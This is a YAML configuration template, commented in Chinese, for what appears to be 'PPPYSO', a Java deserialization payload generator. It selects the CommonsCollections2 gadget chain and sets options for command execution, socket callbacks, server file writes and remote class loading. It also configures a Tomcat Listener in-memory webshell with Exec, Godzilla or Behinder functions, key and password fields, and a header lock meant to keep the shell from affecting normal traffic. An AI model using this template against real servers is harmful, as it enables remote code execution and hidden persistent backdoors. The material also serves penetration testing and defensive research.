### 执行模板
PPPYSO:
  # 调用链
  Gadget: CommonsCollections2

  # 序列化类型: 默认为原生 HexAscii XStream UTF8Mix
  serializationType: UTF8Mix
  # 输出类型: Default Base64 GZIP
  output: Base64
  # 保存默认为 true
  save: true
  # 结果保存绝对路径: 默认当前路径下生成 result.bin
  savePath:
  # 关闭输出只保留 payload 默认为 false
  closePrinter: false

  ### Sink 点增强
  SinksHelper:
    # 选择需要生效的增强类型
    enchant: JavaClass

    ### Command —> 命令执行增强
    Command:
      # 命令
      command: open -a Calculator.app
      # 命令执行类型: Runtime ProcessBuilder ScriptEngine
      commandType: Runtime
      # 操作系统: win or unix
      os:
      # ScriptEngine 指定 code
      code:
      # 从文件中指定
      codeFile:

    ### Delay -> 延时 使用 Thread.sleep 触发
    Delay:
      # 延时时间 /s
      delayTime: 2

    ### Socket -> 发起 Socket 连接
    Socket:
      # 请求地址: 可通过:来指定端口 eg. 127.0.0.1:1234
      host: 127.0.0.1:1234

    ### FileWrite -> 文件写入
    FileWrite:
      # 服务端文件路径
      serverFilePath: /tmp/server.txt
      # 支持从本地读取文件
      localFilePath: /tmp/local.txt
      # 直接写入文件内容 localFilePath > fileContent
      fileContent: this is file content

    ### LocalLoad 本地类加载，使用内置的 RCE 回显、内存马
    # 具体配置在 JavaClassHelper 中
    LocalLoad:
      # 可选 InvokerTransformer3 加载方式: 默认 ScriptEngineManager，还提供了 rhino (需要 org.mozilla:rhino 依赖)
      loadFunction:

    ### RemoteLoad -> 远程类加载
    RemoteLoad:
      # 加载地址
      url:
      # 全限定类名
      remoteClassName:
      # 如果为有参构造时输入参数
      constructor:

  ### JavaClass —> JavaClass 生成增强
  JavaClassHelper:
    # 继承 AbstractTranslet
    extendsAbstractTranslet: false

    # JavaClass 类型: MemShell RceEcho 还可以通过 Custom 从本地读取
    javaClassHelperType: MemShell
    # 从本地读取 JavaClass 需要为 .class 或者经过 Base64 加密(yv66vg)
    javaClassFilePath:
    # 指定 JavaClass 额外生成方式: 目前额外提供了 AutoFind 遍历上下文来获取请求上下文
    javaClassType:

    # 组件
    middleware: Tomcat
    # 内存马类型
    memShell: Listener
    # 内存马功能: Exec Godzilla Behinder sou5
    memShellFunction: Exec

    ## 内存马信息 置空时默认随机生成
    # 内存马名称
    NAME:
    # 请求头
    HEADER:
    # 请求参数
    PARAM:
    # 访问路径
    PATH:

    ## webshell 相关信息
    key:
    pass:

    # 请求时指定约束请求头需要带有特定值 避免影响业务
    lockHeaderKey:
    lockHeaderValue:

  ### 调用链相关增强
  # SignedObject 二次反序列化
  wrapSerialization: false
  # CB 链版本可选 1.8.3
  CBVersion: 1.8.3